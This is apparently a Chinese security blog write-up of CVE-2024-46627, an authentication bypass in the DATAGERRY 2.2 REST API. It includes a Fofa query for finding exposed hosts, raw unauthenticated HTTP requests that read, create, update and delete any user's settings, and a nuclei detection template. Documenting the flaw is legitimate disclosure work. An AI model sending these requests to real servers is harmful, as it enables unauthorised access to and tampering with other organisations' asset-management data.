首页 > 其他分享 >DATAGERRY REST API身份验证绕过漏洞(CVE-2024-46627)

DATAGERRY REST API身份验证绕过漏洞(CVE-2024-46627)

时间:2024-10-11 10:47:47浏览次数:11  
标签:xml settings image 46627 身份验证 Accept application REST type

0X01 产品描述:

        ‌DATAGERRY是一个灵活的开源CMDB和资产管理工具,它完全将数据模型的定义留给用户。‌ 用户只需在一个易于使用的webfrontend中定义自己的对象类型(如服务器、路由器、租赁线路、位置等)。通过DATAGERRY的导出API,存储在DATAGERRY中的CMDB对象可以轻松地导出到外部系统,如监控系统、票据系统、配置管理等‌        

0x02 漏洞描述:

        DATAGERRY 2.2版本存在安全漏洞,该漏洞源于REST API 中缺少对以下端点的访问控制(/rest/users/<id>/settings/),这允许攻击者在未经身份验证的情况下读取任何用户的设置、创建设置、删除设置和更新设置。

0x03 影响版本:

DATAGERRY :2.2

0x04 搜索语句:

Fofa:title="datagerry"

0x05 漏洞复现:

该漏洞只出现在V2.2版本中,在REST API中缺少了对以下端点的访问控制,导致实现对用户配置增删改查

问题api

/rest/users/<id>/settings/(获取、发布)

- /rest/users/<id>/settings/<setting>(删除、放置)

具体配置可以参考官网配置文档进行接口请求包构造:

2. User Management — DATAGERRY undefined documentation

复现过程:

获取所有设置对象:

GET /rest/users/1/settings/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close

 

查询特定的某一个设置对象:

注意这里settings后的路由换成所想查询的resource数据

GET /rest/users/1/settings/framework-type?typeAddSuccess=3 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close

 任意对象创建:

POST /rest/users/1/settings/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close

{
    "resource" : "framework-object-type-51121",
    "user_id" : 1,
    "setting_type" : "APPLICATION"
}

 

更新所创建的对象数据:

PUT /rest/users/1/settings/framework-object-type-5111 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close

{
    "resource" : "framework-object-type-5111",
    "user_id" : 1,
    "payload" : {},
    "setting_type" : "GLOBAL"
}

 删除所选定的对象数据

DELETE /rest/users/1/settings/framework-object-type-51121 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close

 

附源自nuclei官网的poc 

id: CVE-2024-46627

info:
  name: DATAGERRY - REST API Auth Bypass
  author: gy741
  severity: critical
  description: |
    Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.
  impact: |
    Allows unauthorized access to REST API
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46627
    - https://daly.wtf/cve-2024-46627-incorrect-access-control-in-becn-datagerry-v2-2-allows-attackers-to-execute-arbitrary-commands-via-crafted-web-requests/
    - https://datagerry.com/
    - https://github.com/DATAGerry/
    - https://github.com/d4lyw/CVE-2024-46627
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-46627
    cwe-id: CWE-284
    epss-score: 0.00045
    epss-percentile: 0.16328
  metadata:
    verified: true
    max-request: 1
    vendor: becon
    product: datagerry
    shodan-query: http.title:"datagerry"
  tags: cve,cve2024,becon,datagerry,unauth,auth-bypass

http:
  - method: GET
    path:
      - '{{BaseURL}}/rest/users/1/settings/'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"response_type":'
          - '"model":'
          - '"time":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 4a0a00473045022040420efc711ffd5727fa72189da9f4e2830a0a1bd247edefb9c439

0x06 修复建议:

更新至最新版本

标签:xml,settings,image,46627,身份验证,Accept,application,REST,type
From: https://blog.csdn.net/xc_214/article/details/142846232

相关文章

  • 【Spring Security OAuth2】- 【使用Spring MVC开发RESTful API】 异步处理rest服务
    作者简介:大家好,我是smart哥,前中兴通讯、美团架构师,现某互联网公司CTO联系qq:184480602,加我进群,大家一起学习,一起进步,一起对抗互联网寒冬学习必须往深处挖,挖的越深,基础越扎实!阶段1、深入多线程阶段2、深入多线程设计模式阶段3、深入juc源码解析阶段4、深入jdk其余源码解析......
  • 【Spring Security OAuth2】- 【使用Spring MVC开发RESTful API】 使用切片拦截rest服
    作者简介:大家好,我是smart哥,前中兴通讯、美团架构师,现某互联网公司CTO联系qq:184480602,加我进群,大家一起学习,一起进步,一起对抗互联网寒冬学习必须往深处挖,挖的越深,基础越扎实!阶段1、深入多线程阶段2、深入多线程设计模式阶段3、深入juc源码解析阶段4、深入jdk其余源码解析......
  • 使用Python实现深度学习模型:智能身份验证与防伪
    在当今数字化时代,身份验证和防伪技术变得尤为重要。深度学习作为人工智能的一个重要分支,提供了强大的工具来解决这些问题。本文将介绍如何使用Python实现一个基于深度学习的智能身份验证与防伪系统,详细讲解其基本原理和实现步骤。一、项目概述本项目旨在通过训练一个卷积......
  • MySQL与RESTfulAPI
    MySQL与RESTfulAPI 2024-01-2566阅读7分钟 1.背景介绍MySQL与RESTfulAPI是一个非常重要的技术主题,它们在现代互联网应用中扮演着关键角色。在这篇文章中,我们将深入探讨这两个技术的核心概念、算法原理、最佳实践以及实际应用场景。1.背景介绍MySQL是一种流行的关......
  • restTemplate 需要手动关闭资源吗
    RestTemplate不需要手动关闭资源。这是因为RestTemplate本身并不直接管理低层次的资源(例如HTTP连接池、套接字等),而是依赖于其底层的HTTP客户端库来处理这些资源的管理。在Spring中,RestTemplate默认使用HttpURLConnection或HttpClient来发送HTTP请求,并且这些底层......
  • spring5 中 RestTemplate 如何使用
    在Spring5中,RestTemplate是一个用于同步地执行HTTP请求并消费RESTfulWeb服务的客户端工具。尽管RestTemplate已被建议逐步被替代为WebClient(SpringWebFlux的一部分)以支持响应式编程模型,但它仍然是处理同步请求的常用工具之一,并且在许多现有项目中广泛使用。基本使......
  • 那么使用restTemplate 的情况下,如果postForObject方法抛出了异常,那么在catch块中还能
    在使用RestTemplate的情况下,调用如postForObject()方法时,如果抛出了异常,比如HTTP4xx或HTTP5xx状态码导致的异常,默认情况下,异常中不会直接包含完整的HTTP响应体(responsebody)。然而,RestTemplate抛出的异常类确实包含了部分响应信息,比如状态码和响应头。通常,如果post......
  • django rest_framework面经
    1、什么是drf组件drf的全称是DjangoRESTfulFramework;它是一个基于django开发的组件,本质是一个django的app;drf可以帮我们快速开发出一个遵循restful规范的程序。2、drf组件提供的功能1.免除csrf认证2.视图(三种:(1)APIView,(2)ListAPIview,(3)GenericViewSet)3.版本处理4......
  • pbootcms模板报错提示PHP Warning: Unknown: open_basedir restriction
    当PbootCMS模板出现报错提示 PHPWarning:Unknown:open_basedirrestrictionineffect.File 时,通常是因为PHP的 open_basedir 限制设置不当。以下是解决该问题的简要步骤:解决步骤检查PHP配置文件(php.ini):确认 open_basedir 设置是否正确。修改 open_b......
  • Restore .bacpac file to DEV VM D365 FO
    Restore.bacpacfiletoDEVVMD365FO Restore.bacpacfiletoDevelopmentVMSteps: 1.       TakeBackupofAxDBdatabasefromDevelopmentVM 2.       OpenCommandPrompt(RunasAdministrator)GoToPath(VersionFoldermightbedif......